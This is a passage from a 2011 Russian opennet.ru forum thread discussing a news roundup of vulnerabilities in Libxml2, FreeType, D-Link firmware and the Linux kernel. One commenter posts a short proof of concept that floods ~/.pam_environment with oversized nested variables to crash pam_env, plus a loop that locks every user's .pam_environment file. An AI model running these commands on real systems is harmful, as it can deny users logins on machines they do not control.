forum.opennet.ru - "Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..." (5)

форумы

помощь

поиск

регистрация

майллист

вход/выход

слежка

"Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..."

Форум Разговоры, обсуждение новостей
Вариант для распечатки		Пред. тема \| След. тема
Изначальное сообщение		[ Отслеживать ]

"Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..."	+/–
Сообщение от opennews (ok) on 30-Окт-11, 23:33
Несколько недавно обнаруженных уязвимостей: - В открытой библиотеке Libxml2 найдены две уязвимости (http://secunia.com/advisories/46632/), вызванные обращением в коде к уже освобождённым блокам памяти. Теоретически уязвимости могут быть использованы для организации выполнения кода злоумышленника при обработке специально оформленных XPath-запросов. Проблема устранена в Git-репозитории проекта; - В библиотеке для рендеринга шрифтов FreeType 2.4.7 (http://sourceforge.net/projects/freetype) устранена опасная уязвимость (http://sourceforge.net/projects/freetype/files/freetype2/2.4...), которая может привести к выполнению кода злоумышленника при обработке специально скомпонованного шрифта Type 1; - В реализации SSH-сервера из состава прошивок некоторых продуктов D-Link (например, коммутаторы DES-3800 и беспроводные маршрутизаторы DWL-2100AP/DWL-3200AP) найдена опасная уязвимость (http://secunia.com/advisories/46637/), позволяющая удалённо выполнить свой код на оборуд... URL: Новость: http://www.opennet.me/opennews/art.shtml?num=32170
Ответить \| Правка \| Cообщить модератору

Оглавление

Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..., pavlinux, 23:33 , 30-Окт-11, (1)

Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..., pavlinux, 00:36 , 31-Окт-11, (2) +1
Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..., pavlinux, 19:06 , 31-Окт-11, (9)

Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..., Аноним, 16:49 , 31-Окт-11, (8)
Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..., Аноним, 16:54 , 01-Ноя-11, (10)

Сообщения по теме [Сортировка по времени | RSS]

1. "Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..." +/–

Сообщение от pavlinux (ok) on 30-Окт-11, 23:33

> Переполнение буфера в функции "xfs_readlink()" может привести к
> выполнению кода злоумышленника при монтировании специально
> оформленного XFS-раздела;
Судя по патчу, надо сделать длиннющую, больше MAXPATHLEN, ссылку.

PAM :)

perl -e 'print " " x 256, "\\";' >> ~/.pam_environment
perl -e 'print " " x 256, "\\";' >> ~/.pam_environment
perl -e 'print " " x 256, "\\";' >> ~/.pam_environment
perl -e 'print " " x 256, "\\";' >> ~/.pam_environment
perl -e 'print "A" x 256;' >> ~/.pam_environment

и ещё...

cat <<EOM >~/.pam_environment
EVIL_FILLER_255 DEFAULT=BBB...BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
EVIL_FILLER_256 DEFAULT=${EVIL_FILLER_255}B
EVIL_FILLER_1024 DEFAULT=${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}
EVIL_FILLER_8191 DEFAULT=${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024} ${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024} ${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_255}
EVIL_OVERFLOW_DOS DEFAULT=${EVIL_FILLER_8191}AAAA
EOM

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

2. "Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..." +1 +/–

Сообщение от pavlinux (ok) on 31-Окт-11, 00:36

Как вариант

for users in `ls /home/`
   do
    echo -ne > $users/.pam_environment;
    chown 65499:65499 $users/.pam_environment;
    chmod 0000 $users/.pam_environment;
done
Пущай мучаются :)

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

9. "Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..." +/–

Сообщение от pavlinux (ok) on 31-Окт-11, 19:06

> EVIL_FILLER_255 DEFAULT=BBB...BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
Кстати, в debian не работает, пишет [pam_env]: unknown variable EVIL_FILLER_255 ...

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

8. "Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..." +/–

Сообщение от Аноним (??) on 31-Окт-11, 16:49

очередной урожай уязвимостей ?
Уязвимость в реализации алгоритма GHASH, которая может привести к разыменованию указателя NULL;  -  O_O  !!!
Уязвимость в реализации AppArmor - я прям на бомбе замедленного действия )))
Возможность инициирования краха ядра - дважды )))!!!!
В реализации SSH-сервера - а вот это интерестно, пригодится

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

10. "Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..." +/–

Сообщение от Аноним (??) on 01-Ноя-11, 16:54

А где взять новую прошивку для DWL-2100AP?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру

1. "Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..."	+/–
Сообщение от pavlinux (ok) on 30-Окт-11, 23:33
> Переполнение буфера в функции "xfs_readlink()" может привести к > выполнению кода злоумышленника при монтировании специально > оформленного XFS-раздела; Судя по патчу, надо сделать длиннющую, больше MAXPATHLEN, ссылку. PAM :) perl -e 'print " " x 256, "\\";' >> ~/.pam_environment perl -e 'print " " x 256, "\\";' >> ~/.pam_environment perl -e 'print " " x 256, "\\";' >> ~/.pam_environment perl -e 'print " " x 256, "\\";' >> ~/.pam_environment perl -e 'print "A" x 256;' >> ~/.pam_environment и ещё... cat <<EOM >~/.pam_environment EVIL_FILLER_255 DEFAULT=BBB...BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB EVIL_FILLER_256 DEFAULT=${EVIL_FILLER_255}B EVIL_FILLER_1024 DEFAULT=${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256} EVIL_FILLER_8191 DEFAULT=${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024} ${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024} ${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_255} EVIL_OVERFLOW_DOS DEFAULT=${EVIL_FILLER_8191}AAAA EOM
Ответить \| Правка \| ^ к родителю #0 \| Наверх \| Cообщить модератору


	2. "Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..."	+1 +/–
	Сообщение от pavlinux (ok) on 31-Окт-11, 00:36
	Как вариант for users in `ls /home/` do echo -ne > $users/.pam_environment; chown 65499:65499 $users/.pam_environment; chmod 0000 $users/.pam_environment; done Пущай мучаются :)
	Ответить \| Правка \| ^ к родителю #1 \| Наверх \| Cообщить модератору


	9. "Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..."	+/–
	Сообщение от pavlinux (ok) on 31-Окт-11, 19:06
	> EVIL_FILLER_255 DEFAULT=BBB...BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB Кстати, в debian не работает, пишет [pam_env]: unknown variable EVIL_FILLER_255 ...
	Ответить \| Правка \| ^ к родителю #1 \| Наверх \| Cообщить модератору

8. "Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..."	+/–
Сообщение от Аноним (??) on 31-Окт-11, 16:49
очередной урожай уязвимостей ? Уязвимость в реализации алгоритма GHASH, которая может привести к разыменованию указателя NULL; - O_O !!! Уязвимость в реализации AppArmor - я прям на бомбе замедленного действия ))) Возможность инициирования краха ядра - дважды )))!!!! В реализации SSH-сервера - а вот это интерестно, пригодится
Ответить \| Правка \| ^ к родителю #0 \| Наверх \| Cообщить модератору

10. "Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..."	+/–
Сообщение от Аноним (??) on 01-Ноя-11, 16:54
А где взять новую прошивку для DWL-2100AP?
Ответить \| Правка \| ^ к родителю #0 \| Наверх \| Cообщить модератору